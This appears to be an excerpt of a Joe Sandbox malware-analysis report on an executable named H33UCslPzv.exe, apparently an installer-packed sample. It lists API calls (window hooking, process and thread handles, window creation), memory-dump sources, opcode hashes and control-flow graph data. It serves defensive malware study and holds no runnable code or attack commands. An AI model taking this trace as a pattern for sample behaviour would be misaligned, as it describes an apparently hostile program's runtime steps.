                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsj6A14.tmp
                                                                  • API String ID: 3213498283-1184143763
                                                                  • Opcode ID: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                  • Instruction ID: 200156b63a22a8533bc35d37f5bbbd655cb9a28a0338e71d1743e581b4aecdbb
                                                                  • Opcode Fuzzy Hash: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                  • Instruction Fuzzy Hash: B2F09651B04F546AFB3292B40CD4B675B88CB95761F18867BD540B62C2C27C48504FAA
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,00402F3E,00000001), ref: 00402D73
                                                                  • GetTickCount.KERNEL32 ref: 00402D91
                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                  • Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
                                                                  • Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                  • Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 004050B7
                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405108
                                                                    • Part of subcall function 004040C7: SendMessageA.USER32(00010404,00000000,00000000,00000000), ref: 004040D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                  • Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
                                                                  • Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                  • Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,76F93410,00000000,C:\Users\user\AppData\Local\Temp\,0040374D,00403567,?,?,00000006,00000008,0000000A), ref: 0040378F
                                                                  • GlobalFree.KERNEL32(00898E90), ref: 00403796
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403775
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-297319885
                                                                  • Opcode ID: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
                                                                  • Instruction ID: 7399a24566e835d4bf74ae8faf6f599a32d3c581d2ea115a227339331e7fa0df
                                                                  • Opcode Fuzzy Hash: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
                                                                  • Instruction Fuzzy Hash: 1BE0C273401120ABC6216F15ED0871A777C6F46B27F02C12BF8407B26087781C434FC8
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\H33UCslPzv.exe,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 004059D2
                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\H33UCslPzv.exe,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 004059E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-2743851969
                                                                  • Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                  • Instruction ID: cdf7710bfdc0c04f3d6b4f220b8e9fd9f04d7b2eba678cf51078301a7514d20a
                                                                  • Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                  • Instruction Fuzzy Hash: 5AD0C7E2409D705EF30372549D05B9F6A48DF17715F1A0467E181A61A1C67C4D4247BD
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 7002115B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 700211B4
                                                                  • GlobalFree.KERNEL32(?), ref: 700211C7
                                                                  • GlobalFree.KERNEL32(?), ref: 700211F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                  • Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: 60e6aa623e6564e28d78b47401a37a4add2a367702222da90ebc2d3145c327bf
                                                                  • Instruction ID: 3557778345d52d73402946f3e350ec16555b41a839846964f5877b8059552f1a
                                                                  • Opcode Fuzzy Hash: 60e6aa623e6564e28d78b47401a37a4add2a367702222da90ebc2d3145c327bf
                                                                  • Instruction Fuzzy Hash: 8B31D4B2504140AFE7118F65FD85BAD7FFDEB15A72B340059FA46C2362D7749862CB20
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
                                                                  • CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B24
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                  • Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
                                                                  • Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                  • Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9

                                                                  Execution Graph

                                                                  Execution Coverage:8.2%
                                                                  Dynamic/Decrypted Code Coverage:97.6%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:123
                                                                  Total number of Limit Nodes:11
                                                                  execution_graph 25720 d2268 25721 d22ac SetWindowsHookExW 25720->25721 25723 d22f2 25721->25723 25724 d7368 DuplicateHandle 25725 d73fe 25724->25725 25814 ad0fc 25815 ad114 25814->25815 25816 ad16e 25815->25816 25821 388520d7 25815->25821 25826 388520e8 25815->25826 25831 388535c8 25815->25831 25839 388535b8 25815->25839 25822 388520e8 25821->25822 25824 388535b8 CallWindowProcW 25822->25824 25825 388535c8 CallWindowProcW 25822->25825 25823 3885212f 25823->25816 25824->25823 25825->25823 25827 3885210e 25826->25827 25829 388535b8 CallWindowProcW 25827->25829 25830 388535c8 CallWindowProcW 25827->25830 25828 3885212f 25828->25816 25829->25828 25830->25828 25834 388535f5 25831->25834 25832 38853629 25836 38853627 25832->25836 25857 388531f4 25832->25857 25834->25832 25835 38853619 25834->25835 25847 38853740 25835->25847 25852 38853750 25835->25852 25836->25836 25840 388535c8 25839->25840 25841 38853629 25840->25841 25843 38853619 25840->25843 25842 388531f4 CallWindowProcW 25841->25842 25844 38853627 25841->25844 25842->25844 25845 38853740 CallWindowProcW 25843->25845 25846 38853750 CallWindowProcW 25843->25846 25844->25844 25845->25844 25846->25844 25849 38853750 25847->25849 25848 388537f0 25848->25836 25861 388537f9 25849->25861 25866 38853808 25849->25866 25854 38853764 25852->25854 25853 388537f0 25853->25836 25855 388537f9 CallWindowProcW 25854->25855 25856 38853808 CallWindowProcW 25854->25856 25855->25853 25856->25853 25858 388531ff 25857->25858 25859 38854e1a CallWindowProcW 25858->25859 25860 38854dc9 25858->25860 25859->25860 25860->25836 25862 38853802 25861->25862 25863 3885381e 25861->25863 25864 38853819 25862->25864 25869 38854d60 25862->25869 25864->25848 25867 38853819 25866->25867 25868 38854d60 CallWindowProcW 25866->25868 25867->25848 25868->25867 25870 388531f4 CallWindowProcW 25869->25870 25871 38854d6a 25870->25871 25871->25864 25726 d7120 25727 d7166 GetCurrentProcess 25726->25727 25729 d71b8 GetCurrentThread 25727->25729 25731 d71b1 25727->25731 25730 d71f5 GetCurrentProcess 25729->25730 25732 d71ee 25729->25732 25735 d722b 25730->25735 25731->25729 25732->25730 25733 d7253 GetCurrentThreadId 25734 d7284 25733->25734 25735->25733 25736 d7980 25738 d79ae 25736->25738 25740 d6f1c 25738->25740 25739 d79ce 25742 d6f27 25740->25742 25741 d84f4 25743 d854f 25741->25743 25758 38857950 25741->25758 25762 3885793f 25741->25762 25742->25741 25742->25743 25748 da178 25742->25748 25753 da188 25742->25753 25743->25739 25749 da1a9 25748->25749 25750 da1cd 25749->25750 25766 da338 25749->25766 25770 da327 25749->25770 25750->25741 25754 da1a9 25753->25754 25755 da1cd 25754->25755 25756 da338 2 API calls 25754->25756 25757 da327 2 API calls 25754->25757 25755->25741 25756->25755 25757->25755 25760 388579b5 25758->25760 25759 38857e18 WaitMessage 25759->25760 25760->25759 25761 38857a02 25760->25761 25761->25743 25763 38857952 25762->25763 25764 38857e18 WaitMessage 25763->25764 25765 38857a02 25763->25765 25764->25763 25765->25743 25767 da345 25766->25767 25768 da37e 25767->25768 25774 d8144 25767->25774 25768->25750 25771 da345 25770->25771 25772 da37e 25771->25772 25773 d8144 2 API calls 25771->25773 25772->25750 25773->25772 25775 d814f 25774->25775 25777 da3f0 25775->25777 25778 d8178 25775->25778 25777->25777 25779 d8183 25778->25779 25784 d8188 25779->25784 25781 da45f 25788 dfad0 25781->25788 25782 da499 25782->25777 25787 d8193 25784->25787 25785 db9e0 25785->25781 25786 da188 2 API calls 25786->25785 25787->25785 25787->25786 25790 dfb01 25788->25790 25791 dfc01 25788->25791 25789 dfb0d 25789->25782 25790->25789 25794 38850ea0 25790->25794 25798 38850e8f 25790->25798 25791->25782 25795 38850ecb 25794->25795 25796 38850f7a 25795->25796 25802 38851eb0 25795->25802 25799 38850ea0 25798->25799 25800 38850f7a 25799->25800 25801 38851eb0 2 API calls 25799->25801 25801->25800 25803 38851ee6 25802->25803 25805 38851f1e CreateWindowExW 25802->25805 25808 38851eb0 CreateWindowExW 25803->25808 25810 38851f30 25803->25810 25804 38851f15 25804->25796 25807 38852054 25805->25807 25807->25807 25808->25804 25811 38851f98 CreateWindowExW 25810->25811 25813 38852054 25811->25813 25813->25813

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 116 38857950-388579b3 117 388579b5-388579df 116->117 118 388579e2-38857a00 116->118 117->118 123 38857a02-38857a04 118->123 124 38857a09-38857a40 118->124 126 38857ec2-38857ed7 123->126 128 38857a46-38857a5a 124->128 129 38857e71 124->129 130 38857a5c-38857a86 128->130 131 38857a89-38857aa8 128->131 132 38857e76-38857e8c 129->132 130->131 138 38857ac0-38857ac2 131->138 139 38857aaa-38857ab0 131->139 132->126 142 38857ac4-38857adc 138->142 143 38857ae1-38857aea 138->143 140 38857ab4-38857ab6 139->140 141 38857ab2 139->141 140->138 141->138 142->132 145 38857af2-38857af9 143->145 146 38857b03-38857b0a 145->146 147 38857afb-38857b01 145->147 149 38857b14 146->149 150 38857b0c-38857b12 146->150 148 38857b17-38857b34 call 388564f0 147->148 153 38857c89-38857c8d 148->153 154 38857b3a-38857b41 148->154 149->148 150->148 156 38857c93-38857c97 153->156 157 38857e5c-38857e6f 153->157 154->129 155 38857b47-38857b84 154->155 165 38857e52-38857e56 155->165 166 38857b8a-38857b8f 155->166 158 38857cb1-38857cba 156->158 159 38857c99-38857cac 156->159 157->132 161 38857cbc-38857ce6 158->161 162 38857ce9-38857cf0 158->162 159->132 161->162 163 38857cf6-38857cfd 162->163 164 38857d8f-38857d96 162->164 167 38857d2c-38857d4e 163->167 168 38857cff-38857d29 163->168 174 38857d9f-38857da4 164->174 165->145 165->157 169 38857bc1-38857bd6 call 38856514 166->169 170 38857b91-38857b9f call 388564fc 166->170 167->164 203 38857d50-38857d5a 167->203 168->167 178 38857bdb-38857bdf 169->178 170->169 183 38857ba1-38857bbf call 38856508 170->183 174->165 180 38857daa-38857dac 174->180 184 38857be1-38857bf3 call 38856520 178->184 185 38857c50-38857c5d 178->185 181 38857dae-38857de7 180->181 182 38857df9-38857e16 call 388564f0 180->182 197 38857df0-38857df7 181->197 198 38857de9-38857def 181->198 182->165 200 38857e18-38857e44 WaitMessage 182->200 183->178 208 38857bf5-38857c25 184->208 209 38857c33-38857c4b 184->209 185->165 201 38857c63-38857c6d call 38856530 185->201 197->165 198->197 205 38857e46 200->205 206 38857e4b 200->206 213 38857c7c-38857c84 call 38856548 201->213 214 38857c6f-38857c77 call 3885653c 201->214 216 38857d72-38857d8d 203->216 217 38857d5c-38857d62 203->217 205->206 206->165 224 38857c27 208->224 225 38857c2c 208->225 209->132 213->165 214->165 216->164 216->203 221 38857d64 217->221 222 38857d66-38857d68 217->222 221->216 222->216 224->225 225->209
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2751728484.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_38850000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c9c2118a1547581b413fa415c827711b48b3eaff747af0e4059b1d75a4ec509
                                                                  • Instruction ID: 5b136c4aff3534b05f3ab9324d13c0718896b94ad9f09bd716c08d35bb98fd57
                                                                  • Opcode Fuzzy Hash: 4c9c2118a1547581b413fa415c827711b48b3eaff747af0e4059b1d75a4ec509
                                                                  • Instruction Fuzzy Hash: 2FF12674A00309CFEB04EFA9C944B9DBBF1BF88704F15C569E409AB2A5DB70A945CB90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 000D719E
                                                                  • GetCurrentThread.KERNEL32 ref: 000D71DB
                                                                  • GetCurrentProcess.KERNEL32 ref: 000D7218
                                                                  • GetCurrentThreadId.KERNEL32 ref: 000D7271
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 0c95617190df5ee2e22856c59db39caa987d29ec8531ba027261e41ac91fdc3d
                                                                  • Instruction ID: 88adfb08ec1466c4c4734214d6308f24f79981f174bf7a3ff27a40ae30eb681d
                                                                  • Opcode Fuzzy Hash: 0c95617190df5ee2e22856c59db39caa987d29ec8531ba027261e41ac91fdc3d
                                                                  • Instruction Fuzzy Hash: 315185B0901349CFDB14CFA9D548BAEBBF1AF48304F20845EE809A73A0DB74A945CF61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 25 d7120-d71af GetCurrentProcess 29 d71b8-d71ec GetCurrentThread 25->29 30 d71b1-d71b7 25->30 31 d71ee-d71f4 29->31 32 d71f5-d7229 GetCurrentProcess 29->32 30->29 31->32 34 d722b-d7231 32->34 35 d7232-d724d call d72f0 32->35 34->35 38 d7253-d7282 GetCurrentThreadId 35->38 39 d728b-d72ed 38->39 40 d7284-d728a 38->40 40->39
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 000D719E
                                                                  • GetCurrentThread.KERNEL32 ref: 000D71DB
                                                                  • GetCurrentProcess.KERNEL32 ref: 000D7218
                                                                  • GetCurrentThreadId.KERNEL32 ref: 000D7271
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 543058f01f6b09b5c948edec7483dff6628c5a5fc3987d9e44ce55b62bde73a9
                                                                  • Instruction ID: 7c46ae19e6d96b810fa398289aef9359abc6532b5ab2a6ad51e3b93784a91783
                                                                  • Opcode Fuzzy Hash: 543058f01f6b09b5c948edec7483dff6628c5a5fc3987d9e44ce55b62bde73a9
                                                                  • Instruction Fuzzy Hash: 515177B0901749CFDB14CFAAD548BAEBBF1AF48304F20845EE809A7350DB746945CF61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 228 38851eb0-38851ee4 229 38851ee6-38851f0d 228->229 230 38851f1e-38851f24 228->230 247 38851f10 call 38851eb0 229->247 248 38851f10 call 38851f30 229->248 231 38851f26-38851f6e 230->231 232 38851f72-38851f96 230->232 231->232 233 38851fa1-38851fa8 232->233 234 38851f98-38851f9e 232->234 236 38851fb3-38852052 CreateWindowExW 233->236 237 38851faa-38851fb0 233->237 234->233 235 38851f15-38851f16 239 38852054-3885205a 236->239 240 3885205b-38852093 236->240 237->236 239->240 244 38852095-38852098 240->244 245 388520a0 240->245 244->245 246 388520a1 245->246 246->246 247->235 248->235
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38852042
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2751728484.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_38850000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 2a2f6af6955d767c3f5dcfa486c60ce485a9117278b6137b207b52fc57f3a792
                                                                  • Instruction ID: ee1bdb24e5da54d469b3455367681128b3cf9348e1d6e8b0a209258ecbc67bcb
                                                                  • Opcode Fuzzy Hash: 2a2f6af6955d767c3f5dcfa486c60ce485a9117278b6137b207b52fc57f3a792
                                                                  • Instruction Fuzzy Hash: 686107B5C05389EFDB02CFA5C940ACEBFB1BF4A300F15819AE858AB261D7359845CF51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 249 38851f30-38851f96 250 38851fa1-38851fa8 249->250 251 38851f98-38851f9e 249->251 252 38851fb3-38852052 CreateWindowExW 250->252 253 38851faa-38851fb0 250->253 251->250 255 38852054-3885205a 252->255 256 3885205b-38852093 252->256 253->252 255->256 260 38852095-38852098 256->260 261 388520a0 256->261 260->261 262 388520a1 261->262 262->262
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38852042
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2751728484.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_38850000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 7aec58cd7660abce0c510911d9a9165fe91686318b1e3a1106ca49134f89ba9c
                                                                  • Instruction ID: dce01783db9a2c8613bef05b0de2c2e4569940a01928e47a032aa1469d17ac21
                                                                  • Opcode Fuzzy Hash: 7aec58cd7660abce0c510911d9a9165fe91686318b1e3a1106ca49134f89ba9c
                                                                  • Instruction Fuzzy Hash: 1441B1B5D10349DFDB14CFA9C884ADEFBB5BF48310F64812AE819AB210DB75A845CF90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
